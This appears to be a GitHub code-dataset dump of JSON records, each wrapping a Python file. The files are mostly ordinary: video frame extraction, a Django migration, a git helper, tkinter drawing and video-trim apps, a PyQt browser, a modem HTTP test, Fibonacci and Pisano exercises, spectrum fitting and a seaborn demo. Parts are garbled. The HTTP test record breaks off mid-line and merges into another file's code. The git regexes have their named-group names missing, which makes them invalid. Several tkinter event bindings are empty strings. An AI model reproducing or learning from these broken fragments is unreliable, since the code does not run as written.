print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n# print(cap.get(cv2.CAP_PROP_FPS))\n\n#비디오 데이터 프레임 단위로 나눠서 캡쳐하기 실습 -> 동영상 Object Detection에 사용\nos.makedirs(\"./data/video_frame_dataset\", exist_ok=True)\n\nimg_count = 0\nwhile True:\n ret, frame = cap.read()\n \n if not ret:\n break\n \n if img_count % 15 == 0:\n img_filename = f\"./data/video_frame_dataset/frame_{img_count:04}.png\"\n #img_count:04 : 뒤에 숫자는 4자리로 맞추는 설정\n cv2.imwrite(img_filename, frame)\n \n img_count += 1\n \ncap.release()","repo_name":"speedp001/MS-AI-School","sub_path":"Data_labeling/Image_video_processing/video_project_01.py","file_name":"video_project_01.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20688254046","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import models, migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('nadep', '0002_auto_20150819_1141'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='prisao',\r\n name='resultado_sentenca',\r\n field=models.SmallIntegerField(blank=True, null=True, verbose_name='Resultado da Senten\\xe7a', choices=[(0, 'Absolvido'), (1, 'Condenado'), (2, 'Desclassificado')]),\r\n ),\r\n migrations.AlterField(\r\n model_name='prisao',\r\n name='resultado_pronuncia',\r\n field=models.SmallIntegerField(blank=True, null=True, verbose_name='Resultado da Pron\\xfancia', choices=[(0, 'Absolvido'), (1, 'Pronunciado'), (2, 'Desclassificado')]),\r\n ),\r\n 
]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"nucleo/nadep/migrations/0003_auto_20150824_1531.py","file_name":"0003_auto_20150824_1531.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38414643816","text":"\"\"\"Basic git operations.\"\"\"\n\nimport subprocess\nimport os\nimport re\nfrom ..exceptions import UsageError, MissingPackageError\n\n\nclass GITRepository(object):\n \"\"\"Helper class for git repository functionality.\n\n Args:\n path (str): The path to a git repository folder.\n \"\"\"\n\n def __init__(self, path):\n self.path = os.path.normpath(os.path.abspath(path))\n\n # Ensure git is installed and we point to a valid repository\n self.version()\n self.status()\n\n def status(self):\n \"\"\"Call git status and parse the results.\"\"\"\n\n try:\n contents = subprocess.check_output(['git', '-C', self.path, 'status', '--porcelain=v2', '-b'], stderr=subprocess.PIPE)\n contents = contents.decode('utf-8')\n except subprocess.CalledProcessError:\n raise UsageError(\"Not a valid git repository: %s\" % self.path, \"Make sure the path is correct\")\n\n return contents.split()\n\n def remote(self, name=\"origin\"):\n \"\"\"Get the remote origin URL.\n\n Args:\n name (str): The name of the remote to get.\n\n Returns:\n str: The remote URL.\n \"\"\"\n\n contents = subprocess.check_output(['git', '-C', self.path, 'remote', 'get-url', name])\n contents = contents.decode('utf-8')\n return contents.rstrip()\n\n def github_name(self, name=\"origin\"):\n \"\"\"Get the user/org and repo name for a github hosted repo.\n\n Args:\n name (str): The name of the remote to get.\n\n Returns:\n (str, str): The github org/username and repo name.\n \"\"\"\n\n remote = self.remote(name)\n info = extract_github_name(remote)\n if info is None:\n raise UsageError(\"Git repository could not be parsed: %s\" % remote, \"Make sure the repository is hosted on github\")\n\n return info\n\n def github_slug(self):\n \"\"\"Get the github slug from this repository.\n\n This is a string of the format user/repo_name.\n \"\"\"\n\n org, repo = self.github_name()\n return \"{}/{}\".format(org, repo)\n\n @classmethod\n def version(cls):\n \"\"\"Return the version of git installed.\"\"\"\n\n try:\n version_string = subprocess.check_output(['git', '--version'])\n version_string = version_string.decode('utf-8')\n except subprocess.CalledProcessError:\n raise MissingPackageError(\"git\", \"Git must be installed\")\n\n return version_string.rstrip()\n\n\n_SSH_REGEX = r\"git@github\\.com:(?P[a-zA-Z0-9_\\-]+)/(?P[a-zA-Z0-9_\\-]+)\\.git\"\n_HTTPS_REGEX = r\"https://github\\.com/(?P[a-zA-Z0-9_\\-]+)/(?P[a-zA-Z0-9_\\-]+)\\.git\"\n\n\ndef extract_github_name(remote):\n \"\"\"Extract a github name from a remote URL.\n\n Args:\n remote (str): A git remote URL\n\n Returns:\n (str, str): The user and repo names.\n\n If the repo cannot be found or is not hosted on Github, None is\n Returned.\n \"\"\"\n\n result = re.match(_SSH_REGEX, remote)\n if result is not None:\n return result.group('user'), result.group('repo')\n\n result = re.match(_HTTPS_REGEX, remote)\n if result is not None:\n return result.group('user'), result.group('repo')\n\n return None\n","repo_name":"iotile/multipackage","sub_path":"multipackage/utilities/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} 
+{"seq_id":"22634912962","text":"import os\nlocation = \"/\".join(str(os.path.abspath(__file__)).split(\"/\")[:-1]) + \"/\"\nprint(location)\n\nimport PIL as pil\nimport tkinter as tk\n\nfrom settings import *\nfrom output import *\n\n\nclass DrawshotApp(tk.Frame):\n\n def __init__(self, parent, *args, **kwargs):\n\n tk.Frame.__init__(self, parent, *args, *kwargs)\n self.parent = parent\n self.settings = get_settings() # from file\n self.cli_enabled = False\n\n self.cur_pos = None, None\n self.last_pos = None, None\n self.draw_modus = \"freehand\"\n\n self.traces = list()\n self.last_trace = list() # list of points, later packed into self.traces\n\n from parser import parse_command # defining it outside as it's prone to complexity\n self.parse_command = parse_command\n \n # init canvas properties\n self.x =self.settings[\"default_x\"]\n self.y =self.settings[\"default_y\"]\n self.bg_colour =self.settings[\"bg_colour\"]\n self.trace_colour =self.settings[\"default_trace_colour\"]\n self.snap_center =self.settings[\"snap_center\"]\n self.save_bg =self.settings[\"save_bg\"]\n\n # where to position window\n if self.snap_center: # center of screen\n self.x_0 = (root.winfo_screenwidth() - self.x) // 2\n self.y_0 = (root.winfo_screenheight() - self.y) // 2\n else: # snap to mouse\n self.x_0 = root.winfo_pointerx() - root.winfo_vrootx()\n self.y_0 = root.winfo_pointery() - root.winfo_vrooty()\n\n DEFAULT_DRAW_CANVAS = f\"{self.x}x{self.y}+{self.x_0}+{self.y_0}\"\n\n parent.geometry(DEFAULT_DRAW_CANVAS) # i think this actually includes window borders, which messes with the size\n parent.title(\"Drawshot\")\n\n \n\n # the chalkboard is what is actually given as an output\n self.chalkboard = tk.Canvas(self, bg=self.bg_colour, bd=0, highlightthickness=0)\n\n # bindings: i/o\n self.chalkboard.bind(\"\", self.movement)\n self.chalkboard.bind(\"\", self.new_trace)\n self.chalkboard.bind(\"\", self.reset_mouse)\n parent.bind(\"\", self.undo_trace) # keypresses don't seem to work on the canvas or the frame\n parent.protocol(\"WM_DELETE_WINDOW\", self.close_window) # pressing the X button or Alt+F4\n parent.protocol(\"\", self.close_window)\n parent.bind(\"\", self.command_modus)\n\n self.chalkboard.pack(expand=True, fill=tk.BOTH)\n\n\n def movement(self, event):\n if self.draw_modus==\"freehand\" or end_of_trace:\n self.last_pos = self.cur_pos\n self.cur_pos = event.x, event.y\n\n if self.last_pos == (0, 0): # update last position to start of trace, allowing traces to jump\n self.last_pos = self.cur_pos\n if self.last_pos == self.cur_pos: # allows user to make single (visible) dots\n self.cur_pos = self.last_pos[0]+1, self.last_pos[1]\n\n # appending each point to the last_trace stack, stored as a number by tkinter\n if self.draw_modus==\"freehand\":\n self.last_trace.append(\n self.chalkboard.create_line(*self.last_pos, *self.cur_pos, fill=self.trace_colour, width=5, smooth=tk.TRUE, capstyle=tk.ROUND, splinesteps=1)\n )\n elif self.draw_modus==\"straight_line\":\n pass\n \n\n def new_trace(self, event):\n print(\"starting new trace...\")\n self.last_pos = event.x, event.y\n self.cur_pos = event.x, event.y\n\n def reset_mouse(self, event):\n print(\"released mouse, saving trace\")\n self.traces.append([point for point in self.last_trace])\n self.last_trace.clear()\n\n def undo_trace(self, event):\n if self.traces:\n print(\"undoing a trace...\")\n for point in self.traces[-1]:\n # print(\"gone point\")\n self.chalkboard.delete(point)\n self.traces.pop()\n print(\"trace gone!\")\n else: \n print(\"nothing 
to undo!\")\n\n\n def command_modus(self, event):\n print(\"cli enabled\")\n if not self.cli_enabled: \n # show cli and let user write\n self.text_input = tk.Entry(self)\n self.text_input.place(height=20,width=500)\n self.text_input.focus()\n self.cli_enabled = True\n else:\n # parse input, vi style in mind\n ui = self.text_input.get()\n print(self.text_input.get())\n \n self.parse_command(self, ui)\n\n # hide cli\n self.text_input.place_forget()\n self.cli_enabled = False \n\n\n\n def close_window(self):\n output = self.chalkboard.postscript(colormode=\"color\")\n # FIXME saving to file is required for clipboard\n if self.settings[\"save_to_file\"]:\n save_to_file(output, self.settings)\n if self.settings[\"save_to_clipboard\"]:\n copy_to_clipboard(output, self.settings)\n\n root.destroy()\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n DrawshotApp(root).pack(side=\"top\", fill=\"both\", expand=True)\n try:\n root.mainloop()\n except:\n exit()\n\n\n\n","repo_name":"mazunki/pyDrawshot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32644042435","text":"\"\"\"\nTest :: FWINT-366/EURY-887/HLLEAPP-595: Support +KHTTPPOST sending data to HTTP server in chunked transfer encoding\n\"\"\"\n\nimport pytest\nimport time\nimport swilog\nimport pexpect\nimport VarGlobal\nimport ast\nfrom autotest import *\n\nswilog.info( \"\\n----- Program start -----\\n\")\n\ndef http_cleanup_func(target_at):\n print(\"\\n===================================================\")\n print(\"Performing http connection cleanup START...\")\n print(\"===================================================\\n\")\n rsp = target_at.run_at_cmd(\"AT+KHTTPCFG?\", 20, [\"OK\"])\n for cfg in rsp.split('\\r\\n'):\n if \"KHTTPCFG:\" in cfg:\n _ = cfg.split(',')\n cfg_num = _[0].replace('+KHTTPCFG: ', '')\n if _[-3] == '1':\n target_at.run_at_cmd(\"AT+KHTTPCLOSE=%s\" % cfg_num, 20, [\"OK\"])\n target_at.run_at_cmd(\"AT+KHTTPDEL=%s\" % cfg_num, 20, [\"OK\"])\n print(\"\\n===================================================\")\n print(\"Performing http connection cleanup END...\")\n print(\"===================================================\\n\")\n\n@pytest.fixture\ndef http_cleanup(target_at):\n http_cleanup_func(target_at)\n yield\n http_cleanup_func(target_at)\n\n# -------------------------- Module Initialization ----------------------------------\ndef A_HL_INT_HTTP_CHUNKED_0000(target_at, read_config, network_tests_setup_teardown, http_cleanup):\n \"\"\"\n Check HTTP AT Commands. 
Nominal/Valid use case\n \"\"\"\n print(\"\\nA_HL_INT_HTTP_0000 TC Start:\\n\")\n test_environment_ready = \"Ready\"\n print(\"\\n------------Test's preambule Start------------\")\n\n HARD_INI = read_config.findtext(\"autotest/HARD_INI\")\n\n # Firmware version check\n SOFT_INI_Soft_Version = read_config.findtext(\"autotest/SOFT_INI_Soft_Version\")\n Firmware_Ver = two_digit_fw_version(SOFT_INI_Soft_Version)\n if Firmware_Ver < \"04.05.03.00\" or \"05.03.00.00\" < Firmware_Ver < \"05.03.03.00\":\n pytest.skip(\"FW<4.5.3 or 5.3.0.08:\r\n begin_entry.delete(0, 'end')\r\n begin_entry.insert(0, value[:-1])\r\n if value:\r\n if len(value) == 3:\r\n begin_entry.insert(2, \":\")\r\n elif len(value) == 6:\r\n begin_entry.insert(5, \":\")\r\n\r\ndef replace_trim_window (window):\r\n\r\n def get_video_file():\r\n filename=select_video_file()\r\n if filename:\r\n global video_path\r\n video_path = filename\r\n video_name = filename.split('/')[-1]\r\n video_name_label.config(text=video_name)\r\n add_video_button.config(text='CHANGE VIDEO')\r\n\r\n window.withdraw()\r\n\r\n trim_window = tk.Tk()\r\n trim_window.title('Trim Video')\r\n trim_window.geometry('280x240')\r\n trim_window.resizable(False, False)\r\n trim_window.configure(background=DARK)\r\n\r\n add_video_button = get_button(\"add a video\", get_video_file, trim_window)\r\n add_video_button.grid(row=0, column=0, padx=10, pady=(10,5), sticky='we',columnspan=2)\r\n trim_window.grid_columnconfigure(0, weight=1)\r\n\r\n video_name_label = get_label(\"No video selected\", trim_window)\r\n video_name_label.grid(row=1, column=0, sticky='we',columnspan=2, pady=(0,25))\r\n\r\n begin_label = get_label(\"begin\", trim_window)\r\n begin_label.grid(row=2, column=0, sticky=\"w\",padx=10)\r\n end_label = get_label(\"end\", trim_window)\r\n end_label.grid(row=2, column=1,sticky=\"e\",padx=10)\r\n\r\n begin_value = tk.StringVar(trim_window)\r\n begin_entry = get_placeholder_entry(trim_window, placeholder=\"00:00:00\", var=begin_value)\r\n begin_entry.grid(row=3, column=0, sticky=\"w\",padx=13)\r\n\r\n end_value = tk.StringVar(trim_window)\r\n end_entry = get_placeholder_entry(trim_window, placeholder=\"00:00:00\", var=end_value)\r\n end_entry.grid(row=3, column=1, sticky=\"e\",padx=13)\r\n\r\n begin_value.trace(\"w\", lambda name, index, mode, sv=begin_value: validate_time(begin_entry, sv))\r\n end_value.trace(\"w\", lambda name, index, mode, sv=end_value: validate_time(end_entry, sv))\r\n\r\n trim_window.grid_columnconfigure(1, weight=1)\r\n\r\n def replace_main_window():\r\n trim_window.destroy()\r\n window.deiconify()\r\n\r\n back_button = get_button(\"back\", replace_main_window, trim_window, height=1)\r\n back_button.grid(row=4, column=0, sticky=\"we\", padx=10, pady=(50, 0))\r\n\r\n def trim_video():\r\n if video_path == \"\":\r\n return\r\n begin = begin_value.get()\r\n end = end_value.get()\r\n if begin == \"\" or end == \"\":\r\n return\r\n begin = begin.split(\":\")\r\n end = end.split(\":\")\r\n begin = int(begin[0]) * 3600 + int(begin[1]) * 60 + int(begin[2])\r\n end = int(end[0]) * 3600 + int(end[1]) * 60 + int(end[2])\r\n if begin >= end:\r\n return\r\n clip = VideoFileClip(video_path)\r\n clip = clip.subclip(begin, end)\r\n clip.write_videofile(os.path.expanduser(\"~\") + f\"/videos/{video_path.split('/')[-1]}_trimmed.mp4\")\r\n message = messagebox.showinfo(\"Trim Video\", \"Video trimmed successfully\")\r\n if message == \"ok\":\r\n replace_main_window()\r\n\r\n render_button = get_button(\"render\", command=trim_video, window=trim_window, 
height=1)\r\n render_button.grid(row=4, column=1, sticky=\"we\", padx=10, pady=(50, 0))\r\n\r\n trim_window.mainloop()","repo_name":"GeorgeListru/video_editor","sub_path":"trim_window.py","file_name":"trim_window.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4483091532","text":"class Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n\n collector = []\n words = s.split(' ')\n for word in words:\n collector.append(''.join(reversed(word)))\n\n return ' '.join(collector)\n\n\n\n# Test cases\n# \"Let's take LeetCode contest\"\n# \"Hey how are you\"\n# \"I'm sooo gonna rock this party\"\n# \"\"\n# \"OneWord\"\n# \"Exclamation Mark Baby!!\"","repo_name":"sureshsarda/ds-and-a","sub_path":"src/main/java/leetcode/557_reverse_words_in_string_III.py","file_name":"557_reverse_words_in_string_III.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40841406085","text":"from PyQt5.QtCore import (\n QSize,\n QUrl,\n)\nfrom PyQt5.QtWidgets import (\n QAction,\n QApplication,\n QMainWindow,\n QStatusBar,\n QTabWidget,\n QToolBar,\n)\nfrom PyQt5.QtGui import (\n QIcon,\n)\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtPrintSupport import QPrintPreviewDialog\n\nimport os\nimport sys\n\n\nhome = os.path.abspath(os.path.dirname(__file__))\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, url=None, appname=None, *args, **kwargs):\n if url:\n self.url = url\n else:\n self.url = \"https://github.com/cacao-accounting/open-marquesote\"\n if appname:\n self.appname = appname\n else:\n self.appname = \"Open Marquesote\"\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.tabs = QTabWidget()\n self.tabs.setDocumentMode(True)\n self.tabs.tabBarDoubleClicked.connect(self.tab_open_doubleclick)\n self.tabs.currentChanged.connect(self.current_tab_changed)\n self.tabs.setTabsClosable(True)\n self.tabs.tabCloseRequested.connect(self.close_current_tab)\n\n self.setCentralWidget(self.tabs)\n\n self.status = QStatusBar()\n self.setStatusBar(self.status)\n\n navtb = QToolBar(\"Navigation\")\n navtb.setIconSize(QSize(16, 16))\n self.addToolBar(navtb)\n\n back_btn = QAction(QIcon(os.path.join(home, \"images\", \"back.png\")), \"Back\", self)\n back_btn.setStatusTip(\"Back to previous page\")\n back_btn.triggered.connect(lambda: self.tabs.currentWidget().back())\n navtb.addAction(back_btn)\n\n next_btn = QAction(QIcon(os.path.join(home, \"images\", \"next.png\")), \"Forward\", self)\n next_btn.setStatusTip(\"Forward to next page\")\n next_btn.triggered.connect(lambda: self.tabs.currentWidget().forward())\n navtb.addAction(next_btn)\n\n reload_btn = QAction(QIcon(os.path.join(home, \"images\", \"reload.png\")), \"Reload\", self)\n reload_btn.setStatusTip(\"Reload page\")\n reload_btn.triggered.connect(lambda: self.tabs.currentWidget().reload())\n navtb.addAction(reload_btn)\n\n home_btn = QAction(QIcon(os.path.join(home, \"images\", \"home.png\")), \"Home\", self)\n home_btn.setStatusTip(\"Go home\")\n home_btn.triggered.connect(self.navigate_home)\n navtb.addAction(home_btn)\n # print_action = QAction(QIcon(os.path.join(home, \"images\", \"printer.png\")), \"Print...\", self)\n # print_action.setStatusTip(\"Print current page\")\n # print_action.triggered.connect(self.print_page)\n # navtb.addAction(print_action)\n new_tab_action = 
QAction(QIcon(os.path.join(home, \"images\", \"ui-tab--plus.png\")), \"New Tab\", self)\n new_tab_action.setStatusTip(\"Open a new tab\")\n new_tab_action.triggered.connect(lambda _: self.add_new_tab())\n navtb.addAction(new_tab_action)\n\n # Uncomment to disable native menubar on Mac\n # self.menuBar().setNativeMenuBar(False)\n\n self.add_new_tab(QUrl(self.url), self.appname)\n\n self.show()\n\n if self.appname is None:\n self.setWindowTitle(self.appname)\n else:\n self.setWindowTitle(self.appname)\n self.setWindowIcon(QIcon(os.path.join(home, \"images\", \"ma-icon-64.png\")))\n\n def add_new_tab(self, qurl=None, label=\"Blank\"):\n\n if qurl is None:\n qurl = QUrl(self.url)\n\n browser = QWebEngineView()\n browser.setUrl(qurl)\n i = self.tabs.addTab(browser, label)\n\n self.tabs.setCurrentIndex(i)\n\n browser.loadFinished.connect(lambda _, i=i, browser=browser: self.tabs.setTabText(i, browser.page().title()))\n\n def tab_open_doubleclick(self, i):\n if i == -1: # No tab under the click\n self.add_new_tab()\n\n def current_tab_changed(self, i):\n qurl = self.tabs.currentWidget().url()\n self.update_urlbar(qurl, self.tabs.currentWidget())\n self.update_title(self.tabs.currentWidget())\n\n def close_current_tab(self, i):\n if self.tabs.count() < 2:\n return\n\n self.tabs.removeTab(i)\n\n def update_title(self, browser):\n if browser != self.tabs.currentWidget():\n # If this signal is not from the current tab, ignore\n return\n\n title = self.tabs.currentWidget().page().title()\n self.setWindowTitle(title)\n\n def print_page(self):\n dlg = QPrintPreviewDialog()\n #dlg.paintRequested.connect()\n dlg.exec_()\n\n def navigate_home(self):\n self.tabs.currentWidget().setUrl(QUrl(self.url))\n\n def navigate_to_url(self): # Does not receive the Url\n q = QUrl(self.url)\n if q.scheme() == \"\":\n q.setScheme(\"http\")\n\n self.tabs.currentWidget().setUrl(q)\n\n def update_urlbar(self, q, browser=None):\n\n if browser != self.tabs.currentWidget():\n # If this signal is not from the current tab, ignore\n return\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MainWindow()\n app.exec_()\n","repo_name":"cacao-accounting/open-marquesote","sub_path":"open_marquesote/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9005538535","text":"'古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?'\n\n\nnum1 = 1;\nnum2 = 1;\nnum3 = 0;\nfor i in range(1, 21):\n if (i == 1):\n print(num1)\n continue\n if (i == 2):\n print(num2)\n continue\n num3 = num1 + num2;\n print(num3)\n num1 = num2\n num2 = num3\n\n\nf1 = 1\nf2 = 1\nfor i in range(1,21):\n print('%12d %12d' % (f1,f2))\n if (i % 2) == 0:\n print (' ')\n f1 = f1 + f2\n f2 = f1 + f2","repo_name":"chenyingjun/py-w3c100example","sub_path":"venv/100example/num11.py","file_name":"num11.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23338162422","text":"from django.urls import path\nfrom .views.accounts import *\nfrom .views.main import *\n\nurlpatterns = [\n path(\"accounts/profiles/\", ProfileApiView.as_view(), name=\"profiles\"),\n #product urls\n path(\"products/\", ProductApiView.as_view({'get':'list'}), name=\"products\"),\n path(\"products/\", ProductApiView.as_view({'get':'retrieve'}), name=\"product_detail\"),\n path(\"products//reviews/\", ReviewApiView.as_view(), 
name=\"reviews\"),\n path(\"products/review/create/\", ReviewCreateApiView.as_view(), name=\"review_create\"),\n path(\"categories/\", CategoriesApiView.as_view(), name=\"categories\"),\n path(\"categories//products/\", CategoryApiView.as_view(), name=\"category_products\"),\n\n path(\"uid/\", LoginApiView.as_view(), name=\"uid\"),\n path(\"register/\", RegisterApiView.as_view(), name=\"register\")\n]\n","repo_name":"Abdulhamid51/MEBEL","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33604544644","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndir = \"071126/\"\nfile = \"s9120706.txt\"\n\nbad_areas = [[2000, 4000], [6498,6599], [6650,6702], [5839, 5895], [4816, 4883], [6868, 6919], \\\n [4450, 4486], [4650, 4713], [4312, 4371], [7000, 9000], [4076, 4115], [5383, 5434]]\n\nspectra = np.loadtxt(dir+file)\n\nx=[]\ny=[]\nfor i in range(0, len(spectra[:,0])):\n b = True\n for j in range(0, len(bad_areas)):\n if((spectra[i, 0]> bad_areas[j][0]) & (spectra[i, 0]< bad_areas[j][1])):\n b = False\n if(b == True):\n x.append(spectra[i,0])\n y.append(spectra[i,1])\n\nz = np.polyfit(x, y, 25)\np = np.poly1d(z)\nxbin = []\nybin = []\nlam_start = 4000\nlam_stop = 7000\nindex_start =0\nindex_stop = len(spectra[:,0])-1\nfor i in range(0, len(spectra[:,0])):\n if(lam_start<=spectra[i,0]):\n index_start = i\n break\nfor i in range(len(spectra[:,0])-1, 0, -1):\n if(lam_stop>=spectra[i,0]):\n index_stop = i\n break\ni=index_start\nwin = 50\nwhile(i bad_areas[k][0]) & (spectra[j, 0]< bad_areas[k][1])):\n b = False\n if(b == False): \n mean_inten = mean_inten+p(spectra[j,0])\n else:\n mean_inten = mean_inten + spectra[j,1]\n mean_lambd = mean_lambd + spectra[j,0]\n mean_inten = mean_inten/ win\n mean_lambd = mean_lambd/ win\n xbin.append(mean_lambd)\n ybin.append(mean_inten)\n i=i+win\n\n \nplt.plot(spectra[:,0], spectra[:,1])\nplt.plot(xbin, ybin, 'r')\nplt.plot(x, p(x), 'r.')\nplt.ylim(0.2e-15, 0.2e-14)\nplt.show()\n\nout = open(dir+file+'.red', 'w')\nfor i in range(0, len(xbin)):\n out.write(str(xbin[i])+\" \"+ str(ybin[i])+ \"\\n\")\nout.close()","repo_name":"arneb89/AstroProgs","sub_path":"cyclon/spec_red.py","file_name":"spec_red.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39471792495","text":"def countLargestGroup(n):\n l = []\n re = []\n for i in range(1, n + 1):\n sum = 0\n while i > 0:\n d = i % 10\n i = i//10\n sum += d\n l.append(sum)\n \n print(l)\n \n for i in range(0, len(l)):\n while len(l) > 0:\n re.append(l.count(l[i]))\n l.remove(l[i])\n print(re)\n\n \n return re.count(max(re))\n\n\n\n \nprint(countLargestGroup(1))","repo_name":"AndrewW-coder/codes","sub_path":"actual code/leetcode/largestcount.py","file_name":"largestcount.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39638645132","text":"# -*- coding: utf-8 -*-\n# 使用了wrap的可以通过 __wrapped__ 来访问,但不应全部相信\n# 如果有多个装饰器,那么大部分情况下只会绕过一层,因为从形来看,装饰器也是一个函数\n# @staticmethod 和 @classmethod 它们把原始函数存储在属性 __func__ 中\nfrom functools import wraps\n\n\ndef logged(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n print(func.__name__)\n return func(*args, *kwargs)\n return wrapper\n\n\n@logged\ndef add(x, y):\n return x + y\n\n\nif __name__ == \"__main__\":\n res1 = add(3, 
4)\n print(res1)\n origin_add = add.__wrapped__\n res2 = origin_add(3, 4)\n print(res2)\n","repo_name":"halysl/python_module_study_code","sub_path":"src/study_cookbook/9元编程/解除一个装饰器.py","file_name":"解除一个装饰器.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33518631425","text":"#!/usr/bin/env python\n\n\"\"\"\n\nThe Fibonacci sequence is a well know sequence in which each entry is the sum of the previous two and the first two entries are 1. If we take the modulo of each term by a constant the sequence will become periodic. For example if we took decided to compute the sequence mod 7 we would get the following:\n\n1 1 2 3 5 1 6 0 6 6 5 4 2 6 1 0 1 1 ...\nThis has a period of 16. A related sequence, called the Pisano sequence, is defined such that a(n) is the period of the fibonacci sequence when calculated modulo n.\n\nTask\nYou will should write a program or function that when given n will compute and output the period of the Fibonacci sequence mod n. That is the nth term in the Pisano sequence.\n\nYou must only support integers on the range 0 < n < 2^30\n\nThis is a code-golf competition so you should aim to minimize the size of your source code as scored by bytes.\n\nTest cases\n1 -> 1\n2 -> 3\n3 -> 8\n4 -> 6\n5 -> 20\n6 -> 24\n7 -> 16\n8 -> 12\n9 -> 24\n10 -> 60\n11 -> 10\n12 -> 24\n\n\"\"\"\n\nfrom functools import *\nfrom sympy import *\n\n# https://oeis.org/A001175\ndef pisano(n):\n if n == 1:\n return 1\n\n f = factorint(n)\n if len(f) > 1:\n return reduce(lcm, (pisano(a**f[a]) for a in f))\n \n k, x = 1, [1, 1]\n while x != [0, 1]:\n k += 1\n x = [x[1], (x[0] + x[1]) % n]\n return k\n\ndef main():\n tab = [1, 3, 8, 6, 20, 24, 16, 12, 24, 60, 10, 24, 28, 48, 40, 24, 36, 24, 18, 60, 16, 30, 48, 24, 100, 84, 72, 48, 14, 120, 30, 48, 40, 36, 80, 24, 76, 18, 56, 60, 40, 48, 88, 30, 120, 48, 32, 24, 112, 300, 72, 84, 108, 72, 20, 48, 72, 42, 58, 120, 60, 30, 48, 96, 140, 120, 136]\n\n for i in range(len(tab)):\n assert(pisano(i + 1) == tab[i])\n\nmain()\n","repo_name":"qeedquan/challenges","sub_path":"codegolf/find-the-pisano-period.py","file_name":"find-the-pisano-period.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3676481584","text":"import pprint\n\nfrom gw_bot.api.slack.API_Slack_Attachment import API_Slack_Attachment\nfrom osbot_aws.helpers.Lambda_Helpers import slack_message, log_to_elk\n\n\nclass Commands_Helper():\n\n def __init__(self, target, with_slack_support=False):\n self.target = target\n self.with_slack_support = with_slack_support\n\n def available_methods(self):\n return [func for func in dir(self.target) if\n callable(getattr(self.target, func)) and not func.startswith(\"_\")]\n\n def help(self, prefix = \"\"):\n help_text = \"\"\n for command in self.available_methods():\n help_text += \" • {0}\\n\".format(command)\n attachments = API_Slack_Attachment(help_text, 'good')\n text = prefix + \"*Here are the `{0}` commands available:*\".format(self.target.__name__)\n return text, attachments.render()\n\n def invoke(self, team_id, channel, params):\n attachments = []\n if len(params) == 0:\n (text, attachments) = self.help()\n else:\n command = params.pop(0) # extract first element from the array\n if command in self.available_methods():\n method = getattr(self.target, command)\n try:\n if self.with_slack_support:\n return method(team_id, channel, params)\n 
else:\n text, attachments = method(params)\n except Exception as error:\n text = ':red_circle: Error processing params `{0}`: _{1}_'.format(params, pprint.pformat(error))\n log_to_elk(\"Error in Lambda_Graph.handle_lambda_event :{0}\".format(error), level='error')\n else:\n (text,attachments) = self.help(':red_circle: command not found `{0}`\\n\\n'.format(command))\n\n return slack_message(text, attachments, channel, team_id)","repo_name":"owasp-sbot/OSBot-Jira","sub_path":"osbot_jira/api/graph/Graph_Commands/Commands_Helper.py","file_name":"Commands_Helper.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"24794030688","text":"import pandas as pd \nimport seaborn as sns \nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(\"Se empieza con los estilos de Seaborn\")\n#Se va utiliar la función countplot para poder graficar y deben ser con variaboles categoricas\n# Se carga dataset de tips desde seaborn \ndataTips = sns.load_dataset('tips')\nprint (dataTips.head())\n#Se configura el estilo el background del plot\nsns.set_style('ticks') #Este puede ser none, white, whitegrid, ticks, darkgrid\nsns.countplot(x='sex', data = 